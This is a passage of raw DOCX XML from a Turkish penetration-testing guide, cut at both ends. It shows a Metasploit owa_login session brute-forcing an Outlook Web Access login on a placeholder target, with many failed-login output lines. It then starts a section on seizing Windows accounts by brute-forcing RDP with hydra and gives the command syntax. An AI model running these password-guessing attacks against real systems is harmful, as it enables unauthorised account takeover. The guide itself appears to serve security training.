              <w:t>USERNAME no A specific username to authenticate as</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>USERPASS_FILE no File containing users and passwords separated by space, one pair per line</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>USER_AS_PASS true no Try the username as the password for all users</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>USER_FILE no File containing usernames, one per line</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>VERBOSE true yes Whether to print output for all attempts</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>VERSION 2007 yes OWA VERSION (2003, 2007, or 2010)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>VHOST no HTTP server virtual host</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C8E89A7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t> “</w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>” komutu ile ekrana basılan seçenekler incelenirse bruteforce yapılırken ihtiyaç duyulabilecek bileşenlerin tamamına yakını bulunmaktadır. Detaylı bir düzenleme yapılması gerektiğinde show advanced komutu da kullanılabilir.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00B3628B" w14:paraId="4B55F793" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1343B219" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>msf auxiliary(owa_login) &gt; set USERPASS_FILE /root/owa_test</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>USERPASS_FILE =&gt; /root/owa_test</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>msf auxiliary(owa_login) &gt; set RPORT 443</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>RPORT =&gt; 443</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>msf auxiliary(owa_login) &gt; set VHOST mail.HEDEF_SITE.com.tr</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>VHOST =&gt; mail.HEDEF_SITE.com.tr</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>msf auxiliary(owa_login) &gt; run</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:0 OWA - Testing version 2010</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:0 OWA - Trying ali : ali</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>-msf auxiliary(owa_login) &gt; run</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Testing version 2010</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : HEDEF_SITE</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'HEDEF_SITE'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying ali : ali</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'ali' : 'ali'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying sam : sam</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'sam' : 'sam'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying user : user</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'user' : 'user'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying user@domain.com : user@domain.com</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'user@domain.com' : 'user@domain.com'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying ali : veli</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'ali' : 'veli'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying sam : john</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'sam' : 'john'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying ali : 12345</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'ali' : '12345'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying user : passwoed</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'user' : 'passwoed'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying user@domain.com : aliveli</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'user@domain.com' : 'aliveli'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : as</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'as'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : df</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'df'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : er</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'er'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : r</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'r'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : tt</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'tt'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE :</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : ''</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : yu</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'yu'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : u</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'u'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : yy</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'yy'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : tg</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'tg'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : 3</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : '3'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : 4</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : '4'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : 45</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : '45'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : bt</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'bt'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : ertvt</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'ertvt'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[*] mail.HEDEF_SITE.com.tr:443 OWA - Trying HEDEF_SITE : grt</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>[-] mail.HEDEF_SITE.com.tr:443 OWA - FAILED LOGIN. 'HEDEF_SITE' : 'grt'</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>[*] Auxiliary module execution completed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2714282C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C07A934" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
    <w:p w14:paraId="0CF311D3" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00902B70">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FF8EA3" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc430104865"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5.10. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:t>Windows Hesapl</w:t>
      </w:r>
      <w:r>
        <w:t>arını Rdp Üzerinden Bruteforce i</w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:t>le Elegeçirme</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="5E0FEBE3" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D95A27" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Açıklama: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Windows işletim sistemleri üzerinde yerelde oturum açılarak yapılabilen her şey uzak masaüstü bağlantısı kurularak da yapabilir. Uzak masaüstü bağlantısı için gerekli olan doğrulama bilgileri yerelde oturum açarken kullanılan bilgiler ile aynıdır. Basit seçilmiş oturum bilgileri saldırganlar tarafından istismar edilerek hedef sisteme giriş yapılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64645937" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Uygulama: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Saldırı aracı olarak hydra kullanılacaktır. Hydra aracının özet olarak kullanım şekli aşağıdaki verilmiştir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BF8505" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kullanıcı adı bilinen bir sistem için denecek bir parola için kullanımı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00D848DB" w14:paraId="71507D10" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="665EFC30" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>hydra –l kullanıcıAdı –p kullanıcıParolası protokol://hedefIPAdresi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64FDA284" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37DACA38" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8CA67A" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D848DB">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>En sık kullanılan hydra parametreleri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00D848DB" w14:paraId="15488B90" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="31DB71E2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00D848DB" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">: parametresi ile </w:t>
            </w:r>
            <w:r w:rsidRPr="00D848DB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
